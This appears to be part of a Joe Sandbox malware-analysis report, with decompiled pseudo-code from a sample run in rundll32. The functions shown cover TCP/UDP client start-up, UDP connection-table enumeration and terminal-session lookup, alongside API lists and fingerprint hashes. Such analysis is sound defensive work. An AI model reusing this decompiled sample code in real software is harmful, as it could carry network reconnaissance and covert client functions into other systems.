                                                                                              0x0426eeb3
                                                                                              0x0426eebe
                                                                                              0x0426eec8
                                                                                              0x0426edf7
                                                                                              0x0426edfa
                                                                                              0x0426ee01
                                                                                              0x0426ee1a
                                                                                              0x0426ee1a
                                                                                              0x0426edf5
                                                                                              0x0426edd6
                                                                                              0x0426edc0
                                                                                              0x0426eda3
                                                                                              0x0426ed89
                                                                                              0x0426ed1d

                                                                                              APIs
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 0426EED7
                                                                                                • Part of subcall function 0426EF50: WSASetLastError.WS2_32(0000273F,?,?), ref: 0426EFD6
                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0426EDB1
                                                                                              • GetLastError.KERNEL32 ref: 0426EE49
                                                                                                • Part of subcall function 0426F0B0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0426F0C4
                                                                                                • Part of subcall function 0426F0B0: connect.WS2_32(?,?,00000010), ref: 0426F0EC
                                                                                                • Part of subcall function 0426F0B0: WSAGetLastError.WS2_32 ref: 0426F0FF
                                                                                              • ResetEvent.KERNEL32(?), ref: 0426EE01
                                                                                              • WSAGetLastError.WS2_32(?,00000005), ref: 0426EE32
                                                                                              • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0426EE66
                                                                                              • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0426EE75
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426EE89
                                                                                              • GetLastError.KERNEL32 ref: 0426EEA7
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426EEB3
                                                                                                • Part of subcall function 0426DB70: htons.WS2_32(?), ref: 0426DBDE
                                                                                                • Part of subcall function 0426DB70: bind.WS2_32(?,00000002,0000001C), ref: 0426DC02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                              • String ID: CTcpClient::Start
                                                                                              • API String ID: 4138520258-3740072585
                                                                                              • Opcode ID: 80653d8c09a2e400a5792f920e3dd10686e9cc144fe1dced32dd5b9a9404073b
                                                                                              • Instruction ID: ed350df12d728732e78c0d59a16b0a2ade6b6ca4aa9c6a3c937e02203dc866de
                                                                                              • Opcode Fuzzy Hash: 80653d8c09a2e400a5792f920e3dd10686e9cc144fe1dced32dd5b9a9404073b
                                                                                              • Instruction Fuzzy Hash: 6251B274710209EFEB14EFA5D948BAEBBB9FF48305F010119E506D7290DBB6B954CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 71%
                                                                                              			E0426D790(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				signed int _v8;
                                                                                              				char _v36;
                                                                                              				char _v64;
                                                                                              				long _v68;
                                                                                              				intOrPtr _v72;
                                                                                              				void* __ebp;
                                                                                              				signed int _t47;
                                                                                              				long _t60;
                                                                                              				long _t61;
                                                                                              				signed int _t69;
                                                                                              				intOrPtr _t76;
                                                                                              				intOrPtr _t82;
                                                                                              				intOrPtr* _t105;
                                                                                              				signed int _t109;
                                                                                              
                                                                                              				_t47 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t47 ^ _t109;
                                                                                              				_t82 = _a4;
                                                                                              				_t105 = __ecx;
                                                                                              				_v72 = _a16;
                                                                                              				if( *((intOrPtr*)( *__ecx + 0xb0))() == 0) {
                                                                                              					L16:
                                                                                              					__eflags = _v8 ^ _t109;
                                                                                              					return E04275AFE(_v8 ^ _t109);
                                                                                              				} else {
                                                                                              					E0426EC90(__ecx + 0x148);
                                                                                              					_t113 =  *(__ecx + 0x50) - 3;
                                                                                              					if( *(__ecx + 0x50) != 3) {
                                                                                              						 *(__ecx + 0x48) = 1;
                                                                                              						SetLastError(0x139f);
                                                                                              						 *(_t105 + 0x148) = 0;
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						 *(__ecx + 0x50) = 0;
                                                                                              						 *(__ecx + 0x148) = 0;
                                                                                              						 *((intOrPtr*)( *__ecx + 0xb4))();
                                                                                              						 *(__ecx + 0xc) = 1;
                                                                                              						_v36 = 0;
                                                                                              						_v64 = 0;
                                                                                              						 *((intOrPtr*)(__ecx + 0x10)) = 5;
                                                                                              						 *(__ecx + 0x14) = 0;
                                                                                              						 *(__ecx + 0x18) = 1;
                                                                                              						_v68 = 0;
                                                                                              						_t60 = E0426DA30(_t82, __ecx, __ecx, __esi, _t113, _t82,  &_v36, _a8, _v72,  &_v64);
                                                                                              						if(_t60 == 0) {
                                                                                              							__imp__#111();
                                                                                              							 *(__ecx + 0x48) = 3;
                                                                                              							goto L13;
                                                                                              						} else {
                                                                                              							_t60 = E0426DB70(__ecx, __ecx, GetLastError,  &_v64,  &_v36, _a20);
                                                                                              							if(_t60 == 0) {
                                                                                              								__imp__#111();
                                                                                              								 *(__ecx + 0x48) = 4;
                                                                                              								L13:
                                                                                              								SetLastError(_t60);
                                                                                              								goto L14;
                                                                                              							} else {
                                                                                              								SetLastError(0);
                                                                                              								_push( *((intOrPtr*)(_t105 + 0x1c)));
                                                                                              								if( *((intOrPtr*)( *_t105 + 0x78))() == 2) {
                                                                                              									_t69 = GetLastError();
                                                                                              									__eflags = _t69;
                                                                                              									_t70 =  ==  ? 0x4c7 : _t69;
                                                                                              									E0426EBB0(_t105, 5, "CUdpClient::Start",  ==  ? 0x4c7 : _t69);
                                                                                              									goto L14;
                                                                                              								} else {
                                                                                              									_push(_a12);
                                                                                              									_t98 = _t105;
                                                                                              									if(E0426DCA0( &_v36, SetLastError, _t105, _t105,  &_v36) == 0) {
                                                                                              										__imp__#111();
                                                                                              										E0426EBB0(_t105, 0xb, "CUdpClient::Start", _t73);
                                                                                              										goto L14;
                                                                                              									} else {
                                                                                              										_t76 = E0427F897(_t98, 0, 0,  &M0426DDE0, _t105, 0, _t105 + 0x44);
                                                                                              										 *((intOrPtr*)(_t105 + 0x40)) = _t76;
                                                                                              										if(_t76 == 0) {
                                                                                              											E0426EBB0(_t105, 8, "CUdpClient::Start", 0x65f);
                                                                                              											L14:
                                                                                              											 *(_t105 + 0xc) = 0;
                                                                                              											 *((intOrPtr*)(_t105 + 0x10)) = 5;
                                                                                              											 *(_t105 + 0x14) = 0;
                                                                                              											 *(_t105 + 0x18) = 1;
                                                                                              											_t61 = GetLastError();
                                                                                              											 *((intOrPtr*)( *_t105 + 4))();
                                                                                              											SetLastError(_t61);
                                                                                              											__eflags = _v8 ^ _t109;
                                                                                              											return E04275AFE(_v8 ^ _t109);
                                                                                              										} else {
                                                                                              											_v68 = 1;
                                                                                              											ResetEvent( *(_t105 + 4));
                                                                                              											return E04275AFE(_v8 ^ _t109);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}

















                                                                                              0x0426d796
                                                                                              0x0426d79d
                                                                                              0x0426d7a4
                                                                                              0x0426d7a9
                                                                                              0x0426d7ab
                                                                                              0x0426d7b8
                                                                                              0x0426d997
                                                                                              0x0426d99e
                                                                                              0x0426d9a9
                                                                                              0x0426d7be
                                                                                              0x0426d7c4
                                                                                              0x0426d7c9
                                                                                              0x0426d7cd
                                                                                              0x0426d980
                                                                                              0x0426d987
                                                                                              0x0426d98d
                                                                                              0x00000000
                                                                                              0x0426d7d3
                                                                                              0x0426d7d3
                                                                                              0x0426d7dc
                                                                                              0x0426d7e8
                                                                                              0x0426d7f0
                                                                                              0x0426d7f7
                                                                                              0x0426d7fd
                                                                                              0x0426d80b
                                                                                              0x0426d815
                                                                                              0x0426d81e
                                                                                              0x0426d825
                                                                                              0x0426d82c
                                                                                              0x0426d839
                                                                                              0x0426d925
                                                                                              0x0426d92b
                                                                                              0x00000000
                                                                                              0x0426d83f
                                                                                              0x0426d84c
                                                                                              0x0426d853
                                                                                              0x0426d916
                                                                                              0x0426d91c
                                                                                              0x0426d932
                                                                                              0x0426d939
                                                                                              0x00000000
                                                                                              0x0426d859
                                                                                              0x0426d861
                                                                                              0x0426d867
                                                                                              0x0426d870
                                                                                              0x0426d8f9
                                                                                              0x0426d8fb
                                                                                              0x0426d902
                                                                                              0x0426d90f
                                                                                              0x00000000
                                                                                              0x0426d876
                                                                                              0x0426d876
                                                                                              0x0426d87c
                                                                                              0x0426d886
                                                                                              0x0426d8e2
                                                                                              0x0426d8f2
                                                                                              0x00000000
                                                                                              0x0426d888
                                                                                              0x0426d898
                                                                                              0x0426d8a0
                                                                                              0x0426d8a5
                                                                                              0x0426d8db
                                                                                              0x0426d93b
                                                                                              0x0426d93b
                                                                                              0x0426d942
                                                                                              0x0426d949
                                                                                              0x0426d950
                                                                                              0x0426d957
                                                                                              0x0426d95f
                                                                                              0x0426d963
                                                                                              0x0426d96e
                                                                                              0x0426d978
                                                                                              0x0426d8a7
                                                                                              0x0426d8aa
                                                                                              0x0426d8b1
                                                                                              0x0426d8ca
                                                                                              0x0426d8ca
                                                                                              0x0426d8a5
                                                                                              0x0426d886
                                                                                              0x0426d870
                                                                                              0x0426d853
                                                                                              0x0426d839
                                                                                              0x0426d7cd

                                                                                              APIs
                                                                                                • Part of subcall function 0426EC90: InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0426ECA5
                                                                                                • Part of subcall function 0426EC90: SwitchToThread.KERNEL32(?,?,00000000,0426E712,?,00000000,04258425,74D0F5E0,00000004,80004005,80004005,80004005,80004005,80004005,?,042587F8), ref: 0426ECBD
                                                                                              • SetLastError.KERNEL32(0000139F), ref: 0426D987
                                                                                                • Part of subcall function 0426DA30: WSASetLastError.WS2_32(0000273F,?,?), ref: 0426DAB6
                                                                                              • SetLastError.KERNEL32(00000000,?,?,00000001,?,?,00000001,?,?), ref: 0426D861
                                                                                              • GetLastError.KERNEL32 ref: 0426D8F9
                                                                                                • Part of subcall function 0426DCA0: WSAEventSelect.WS2_32(?,?,00000030), ref: 0426DCB6
                                                                                                • Part of subcall function 0426DCA0: connect.WS2_32(?,?,00000010), ref: 0426DCDE
                                                                                                • Part of subcall function 0426DCA0: WSAGetLastError.WS2_32(?,74CB4D40,?,0426D884,?,00000005), ref: 0426DCF1
                                                                                              • ResetEvent.KERNEL32(?), ref: 0426D8B1
                                                                                              • WSAGetLastError.WS2_32(?,00000005), ref: 0426D8E2
                                                                                              • WSAGetLastError.WS2_32(?,?,00000001,?,?,00000001,?,?), ref: 0426D916
                                                                                              • WSAGetLastError.WS2_32(?,?,00000001,?,?), ref: 0426D925
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426D939
                                                                                              • GetLastError.KERNEL32 ref: 0426D957
                                                                                              • SetLastError.KERNEL32(00000000), ref: 0426D963
                                                                                                • Part of subcall function 0426DB70: htons.WS2_32(?), ref: 0426DBDE
                                                                                                • Part of subcall function 0426DB70: bind.WS2_32(?,00000002,0000001C), ref: 0426DC02
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$Event$CompareExchangeInterlockedResetSelectSwitchThreadbindconnecthtons
                                                                                              • String ID: CUdpClient::Start
                                                                                              • API String ID: 4138520258-3951387650
                                                                                              • Opcode ID: e8e7537bb1d575841fd43c0e9700c7a80e11383d4ba0f47954853d0595477a79
                                                                                              • Instruction ID: 3d4f99fdd4be3af3ad475e0dccfcca567d558fd50effd1c8b03064d929fe402e
                                                                                              • Opcode Fuzzy Hash: e8e7537bb1d575841fd43c0e9700c7a80e11383d4ba0f47954853d0595477a79
                                                                                              • Instruction Fuzzy Hash: 02516271720609EFDB14EFA5D848BAEBBB9FF48304F000119E506D7291DBB5B955CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 58%
                                                                                              			E0425D980(void* __edi, void* __esi) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v16;
                                                                                              				short _v540;
                                                                                              				_Unknown_base(*)()* _v544;
                                                                                              				char _v548;
                                                                                              				signed int* _v552;
                                                                                              				long _v556;
                                                                                              				long _v560;
                                                                                              				intOrPtr _v576;
                                                                                              				_Unknown_base(*)() _v592;
                                                                                              				intOrPtr _v596;
                                                                                              				long _v600;
                                                                                              				long _v604;
                                                                                              				signed int _t44;
                                                                                              				struct HINSTANCE__* _t46;
                                                                                              				_Unknown_base(*)()* _t49;
                                                                                              				void* _t50;
                                                                                              				signed int* _t51;
                                                                                              				signed int* _t55;
                                                                                              				int _t67;
                                                                                              				signed int _t75;
                                                                                              				_Unknown_base(*)()* _t85;
                                                                                              				intOrPtr _t86;
                                                                                              				long _t87;
                                                                                              				intOrPtr _t91;
                                                                                              				long _t93;
                                                                                              				void* _t96;
                                                                                              				signed int* _t100;
                                                                                              				void* _t101;
                                                                                              				signed int _t106;
                                                                                              				void* _t109;
                                                                                              				signed int _t112;
                                                                                              				void* _t113;
                                                                                              				void* _t116;
                                                                                              				void* _t120;
                                                                                              
                                                                                              				_t112 = (_t109 - 0x00000008 & 0xfffffff0) + 4;
                                                                                              				_v8 =  *((intOrPtr*)(_t109 + 4));
                                                                                              				_t106 = _t112;
                                                                                              				_t113 = _t112 - 0x258;
                                                                                              				_t44 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v16 = _t44 ^ _t106;
                                                                                              				_push(__esi);
                                                                                              				_t93 = 0;
                                                                                              				_v604 = 0;
                                                                                              				_v600 = 0;
                                                                                              				_t46 = LoadLibraryA("iphlpapi.dll");
                                                                                              				if(_t46 == 0) {
                                                                                              					L4:
                                                                                              					return E04275AFE(_v16 ^ _t106);
                                                                                              				} else {
                                                                                              					_t49 = GetProcAddress(_t46, "GetExtendedUdpTable");
                                                                                              					_v544 = _t49;
                                                                                              					_v548 = 0;
                                                                                              					_t50 =  *_t49(0,  &_v548, 1, 2, 1, 0);
                                                                                              					_t123 = _t50 - 0x7a;
                                                                                              					if(_t50 != 0x7a) {
                                                                                              						goto L4;
                                                                                              					} else {
                                                                                              						_push(_v548);
                                                                                              						_t51 = E04275B55( &_v548, __esi, _t123);
                                                                                              						_t116 = _t113 + 4;
                                                                                              						_t100 = _t51;
                                                                                              						_v552 = _t100;
                                                                                              						_push(0);
                                                                                              						_push(1);
                                                                                              						_push(2);
                                                                                              						_push(1);
                                                                                              						_push( &_v548);
                                                                                              						_push(_t100);
                                                                                              						if(_v544() == 0) {
                                                                                              							_t101 = LocalAlloc(0x40, 0x2800);
                                                                                              							_v556 = 0;
                                                                                              							_t55 = _v552;
                                                                                              							__eflags =  *_t55;
                                                                                              							if( *_t55 > 0) {
                                                                                              								_t85 =  &(_t55[2]);
                                                                                              								_v544 = _t85;
                                                                                              								do {
                                                                                              									_v596 =  *((intOrPtr*)(_t85 - 4));
                                                                                              									_t86 =  *((intOrPtr*)(_t85 + 4));
                                                                                              									_push(_t86);
                                                                                              									_v592 =  *_t85;
                                                                                              									_v576 = _t86;
                                                                                              									E0425D4D0(_t86,  &_v540);
                                                                                              									_t120 = _t116 + 4;
                                                                                              									_v560 = 0x22 + lstrlenW( &_v540) * 2 + _t93;
                                                                                              									_t67 = LocalSize(_t101);
                                                                                              									_t87 = _v560;
                                                                                              									__eflags = _t67 - _t87;
                                                                                              									if(_t67 < _t87) {
                                                                                              										_t101 = LocalReAlloc(_t101, _t87, 0x42);
                                                                                              									}
                                                                                              									asm("movups xmm0, [ebp-0x250]");
                                                                                              									asm("movups [edi+esi], xmm0");
                                                                                              									asm("movups xmm0, [ebp-0x240]");
                                                                                              									asm("movups [edi+esi+0x10], xmm0");
                                                                                              									_t96 = _t93 + 0x20;
                                                                                              									E0427E060(_t96 + _t101,  &_v540, 2 + lstrlenW( &_v540) * 2);
                                                                                              									_t116 = _t120 + 0xc;
                                                                                              									_t75 = lstrlenW( &_v540);
                                                                                              									_t91 = _v556 + 1;
                                                                                              									_t85 = _v544 + 0xc;
                                                                                              									_v556 = _t91;
                                                                                              									_v544 = _t85;
                                                                                              									_t93 = _t96 + _t75 * 2 + 2;
                                                                                              									__eflags = _t91 -  *_v552;
                                                                                              								} while (_t91 <  *_v552);
                                                                                              							}
                                                                                              							LocalReAlloc(_t101, _t93, 0x42);
                                                                                              							E04275B47(_v552);
                                                                                              							__eflags = _v16 ^ _t106;
                                                                                              							return E04275AFE(_v16 ^ _t106, 0x10);
                                                                                              						} else {
                                                                                              							_push(0x10);
                                                                                              							E04275B47(_t100);
                                                                                              							goto L4;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}






































                                                                                              0x0425d989
                                                                                              0x0425d990
                                                                                              0x0425d994
                                                                                              0x0425d996
                                                                                              0x0425d99c
                                                                                              0x0425d9a3
                                                                                              0x0425d9a6
                                                                                              0x0425d9a8
                                                                                              0x0425d9af
                                                                                              0x0425d9b5
                                                                                              0x0425d9bb
                                                                                              0x0425d9c3
                                                                                              0x0425da2d
                                                                                              0x0425da41
                                                                                              0x0425d9c5
                                                                                              0x0425d9cb
                                                                                              0x0425d9de
                                                                                              0x0425d9e6
                                                                                              0x0425d9ec
                                                                                              0x0425d9ee
                                                                                              0x0425d9f1
                                                                                              0x00000000
                                                                                              0x0425d9f3
                                                                                              0x0425d9f3
                                                                                              0x0425d9f9
                                                                                              0x0425d9fe
                                                                                              0x0425da01
                                                                                              0x0425da09
                                                                                              0x0425da0f
                                                                                              0x0425da10
                                                                                              0x0425da12
                                                                                              0x0425da14
                                                                                              0x0425da16
                                                                                              0x0425da17
                                                                                              0x0425da20
                                                                                              0x0425da4f
                                                                                              0x0425da51
                                                                                              0x0425da57
                                                                                              0x0425da5d
                                                                                              0x0425da5f
                                                                                              0x0425da65
                                                                                              0x0425da68
                                                                                              0x0425da70
                                                                                              0x0425da79
                                                                                              0x0425da81
                                                                                              0x0425da84
                                                                                              0x0425da85
                                                                                              0x0425da8b
                                                                                              0x0425da91
                                                                                              0x0425da96
                                                                                              0x0425dab0
                                                                                              0x0425dab6
                                                                                              0x0425dabc
                                                                                              0x0425dac2
                                                                                              0x0425dac4
                                                                                              0x0425dad0
                                                                                              0x0425dad0
                                                                                              0x0425dad2
                                                                                              0x0425dae0
                                                                                              0x0425dae4
                                                                                              0x0425daeb
                                                                                              0x0425daf0
                                                                                              0x0425db0c
                                                                                              0x0425db11
                                                                                              0x0425db1b
                                                                                              0x0425db2d
                                                                                              0x0425db2e
                                                                                              0x0425db31
                                                                                              0x0425db3a
                                                                                              0x0425db46
                                                                                              0x0425db49
                                                                                              0x0425db49
                                                                                              0x0425da70
                                                                                              0x0425db55
                                                                                              0x0425db65
                                                                                              0x0425db72
                                                                                              0x0425db81
                                                                                              0x0425da22
                                                                                              0x0425da22
                                                                                              0x0425da25
                                                                                              0x00000000
                                                                                              0x0425da2a
                                                                                              0x0425da20
                                                                                              0x0425d9f1

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000), ref: 0425D9BB
                                                                                              • GetProcAddress.KERNEL32(00000000,GetExtendedUdpTable), ref: 0425D9CB
                                                                                              • LocalAlloc.KERNEL32(00000040,00002800), ref: 0425DA49
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425DAA0
                                                                                              • LocalSize.KERNEL32(00000000), ref: 0425DAB6
                                                                                              • LocalReAlloc.KERNEL32(00000000,?,00000042), ref: 0425DACA
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425DAF3
                                                                                              • lstrlenW.KERNEL32(?), ref: 0425DB1B
                                                                                              • LocalReAlloc.KERNEL32(00000000,00000000,00000042), ref: 0425DB55
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Local$Alloclstrlen$AddressLibraryLoadProcSize
                                                                                              • String ID: GetExtendedUdpTable$iphlpapi.dll
                                                                                              • API String ID: 2444183403-1809394930
                                                                                              • Opcode ID: fcdd86e0ee81e7fc76e5a5acc727c81569d43d10522c01dcb8ad956fbb24f2c5
                                                                                              • Instruction ID: 0991dd7fcbc4dd49fe883a18dbb741f88c71719b12edcccdea1c65414da202a9
                                                                                              • Opcode Fuzzy Hash: fcdd86e0ee81e7fc76e5a5acc727c81569d43d10522c01dcb8ad956fbb24f2c5
                                                                                              • Instruction Fuzzy Hash: C4518571E54218ABDB20DF68EC89BE9B7B4FB54304F104199E909A3250EB746E81CF95
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 43%
                                                                                              			E042670E0(void* __ebx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				struct _OSVERSIONINFOW _v284;
                                                                                              				void* _v288;
                                                                                              				char _v292;
                                                                                              				_Unknown_base(*)()* _v296;
                                                                                              				signed int _t26;
                                                                                              				_Unknown_base(*)()* _t36;
                                                                                              				struct HINSTANCE__* _t37;
                                                                                              				_Unknown_base(*)()* _t38;
                                                                                              				signed int _t43;
                                                                                              				signed int _t44;
                                                                                              				intOrPtr* _t50;
                                                                                              				intOrPtr* _t54;
                                                                                              				intOrPtr* _t55;
                                                                                              				intOrPtr _t58;
                                                                                              				signed int _t60;
                                                                                              				struct HINSTANCE__* _t62;
                                                                                              				intOrPtr _t64;
                                                                                              				signed int _t66;
                                                                                              
                                                                                              				_t26 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t26 ^ _t66;
                                                                                              				_t60 = 0;
                                                                                              				E0427DEA0(0,  &_v284, 0, 0x114);
                                                                                              				_v284.dwOSVersionInfoSize = 0x114;
                                                                                              				GetVersionExW( &_v284);
                                                                                              				if(_v284.dwMajorVersion < 6) {
                                                                                              					L24:
                                                                                              					return E04275AFE(_v8 ^ _t66);
                                                                                              				} else {
                                                                                              					_t62 = LoadLibraryA("Wtsapi32.dll");
                                                                                              					if(_t62 != 0) {
                                                                                              						_t50 = GetProcAddress(_t62, "WTSEnumerateSessionsW");
                                                                                              						_t36 = GetProcAddress(_t62, "WTSFreeMemory");
                                                                                              						_v296 = _t36;
                                                                                              						if(_t50 == 0 || _t36 == 0) {
                                                                                              							L20:
                                                                                              							_t37 = LoadLibraryA("Kernel32.dll");
                                                                                              							if(_t37 != 0) {
                                                                                              								_t38 = GetProcAddress(_t37, "WTSGetActiveConsoleSessionId");
                                                                                              								if(_t38 != 0) {
                                                                                              									_t60 =  *_t38();
                                                                                              								}
                                                                                              							}
                                                                                              						} else {
                                                                                              							_v292 = 0;
                                                                                              							_push( &_v288);
                                                                                              							_v288 = 0;
                                                                                              							_push( &_v292);
                                                                                              							_push(1);
                                                                                              							_push(0);
                                                                                              							_push(0);
                                                                                              							if( *_t50() == 0) {
                                                                                              								goto L20;
                                                                                              							} else {
                                                                                              								_t58 = _v288;
                                                                                              								_t43 = 0;
                                                                                              								_t64 = _v292;
                                                                                              								if(_t58 == 0) {
                                                                                              									L12:
                                                                                              									_t44 = 0;
                                                                                              									if(_t58 != 0) {
                                                                                              										_t54 = _t64 + 8;
                                                                                              										while( *_t54 != 1) {
                                                                                              											_t44 = _t44 + 1;
                                                                                              											_t54 = _t54 + 0xc;
                                                                                              											if(_t44 < _t58) {
                                                                                              												continue;
                                                                                              											} else {
                                                                                              											}
                                                                                              											goto L18;
                                                                                              										}
                                                                                              										_t60 =  *((intOrPtr*)(_t64 + (_t44 + _t44 * 2) * 4));
                                                                                              									}
                                                                                              								} else {
                                                                                              									_t55 = _t64 + 8;
                                                                                              									while( *_t55 != _t60) {
                                                                                              										_t43 = _t43 + 1;
                                                                                              										_t55 = _t55 + 0xc;
                                                                                              										if(_t43 < _t58) {
                                                                                              											continue;
                                                                                              										} else {
                                                                                              											goto L12;
                                                                                              										}
                                                                                              										goto L18;
                                                                                              									}
                                                                                              									_t60 =  *((intOrPtr*)(_t64 + (_t43 + _t43 * 2) * 4));
                                                                                              									if(_t60 == 0) {
                                                                                              										goto L12;
                                                                                              									}
                                                                                              								}
                                                                                              								L18:
                                                                                              								_v296(_t64);
                                                                                              								if(_t60 == 0) {
                                                                                              									goto L20;
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						goto L24;
                                                                                              					} else {
                                                                                              						return E04275AFE(_v8 ^ _t66);
                                                                                              					}
                                                                                              				}
                                                                                              			}






















                                                                                              0x042670e9
                                                                                              0x042670f0
                                                                                              0x042670fa
                                                                                              0x04267104
                                                                                              0x0426710c
                                                                                              0x0426711d
                                                                                              0x0426712a
                                                                                              0x04267227
                                                                                              0x04267238
                                                                                              0x04267130
                                                                                              0x0426713b
                                                                                              0x0426713f
                                                                                              0x0426716a
                                                                                              0x0426716c
                                                                                              0x0426716e
                                                                                              0x04267176
                                                                                              0x04267207
                                                                                              0x0426720c
                                                                                              0x04267214
                                                                                              0x0426721c
                                                                                              0x04267220
                                                                                              0x04267224
                                                                                              0x04267224
                                                                                              0x04267220
                                                                                              0x04267184
                                                                                              0x0426718a
                                                                                              0x04267190
                                                                                              0x04267197
                                                                                              0x0426719d
                                                                                              0x0426719e
                                                                                              0x042671a0
                                                                                              0x042671a2
                                                                                              0x042671a8
                                                                                              0x00000000
                                                                                              0x042671aa
                                                                                              0x042671aa
                                                                                              0x042671b0
                                                                                              0x042671b2
                                                                                              0x042671ba
                                                                                              0x042671d8
                                                                                              0x042671d8
                                                                                              0x042671dc
                                                                                              0x042671de
                                                                                              0x042671e1
                                                                                              0x042671e6
                                                                                              0x042671e7
                                                                                              0x042671ec
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042671ee
                                                                                              0x00000000
                                                                                              0x042671ec
                                                                                              0x042671f3
                                                                                              0x042671f3
                                                                                              0x042671bc
                                                                                              0x042671bc
                                                                                              0x042671c0
                                                                                              0x042671c4
                                                                                              0x042671c5
                                                                                              0x042671ca
                                                                                              0x00000000
                                                                                              0x042671cc
                                                                                              0x00000000
                                                                                              0x042671cc
                                                                                              0x00000000
                                                                                              0x042671ca
                                                                                              0x042671d1
                                                                                              0x042671d6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042671d6
                                                                                              0x042671f6
                                                                                              0x042671f7
                                                                                              0x042671ff
                                                                                              0x00000000
                                                                                              0x04267201
                                                                                              0x042671ff
                                                                                              0x042671a8
                                                                                              0x00000000
                                                                                              0x04267143
                                                                                              0x04267150
                                                                                              0x04267150
                                                                                              0x0426713f

                                                                                              APIs
                                                                                              • GetVersionExW.KERNEL32(00000114,?,00000104,00000000), ref: 0426711D
                                                                                              • LoadLibraryA.KERNEL32(Wtsapi32.dll,?,00000104,00000000), ref: 04267135
                                                                                              • GetProcAddress.KERNEL32(00000000,WTSEnumerateSessionsW), ref: 04267158
                                                                                              • GetProcAddress.KERNEL32(00000000,WTSFreeMemory), ref: 0426716C
                                                                                              • LoadLibraryA.KERNEL32(Kernel32.dll,?,00000104,00000000), ref: 0426720C
                                                                                              • GetProcAddress.KERNEL32(00000000,WTSGetActiveConsoleSessionId), ref: 0426721C
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad$Version
                                                                                              • String ID: Kernel32.dll$WTSEnumerateSessionsW$WTSFreeMemory$WTSGetActiveConsoleSessionId$Wtsapi32.dll
                                                                                              • API String ID: 158333003-4205620339
                                                                                              • Opcode ID: f0312fcc3ed40565167fbdba8167424693fddba41810a15c9ad889f374efdea2
                                                                                              • Instruction ID: 5644b503d816146528622ce08067b466f0c7a33f849fc7f4068ac9e8a18261b7
                                                                                              • Opcode Fuzzy Hash: f0312fcc3ed40565167fbdba8167424693fddba41810a15c9ad889f374efdea2
                                                                                              • Instruction Fuzzy Hash: F131B831B2021A9BDB25DA68FC45AEA73F9EBC9714F1500AAE906D3144EF74FD81CE50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

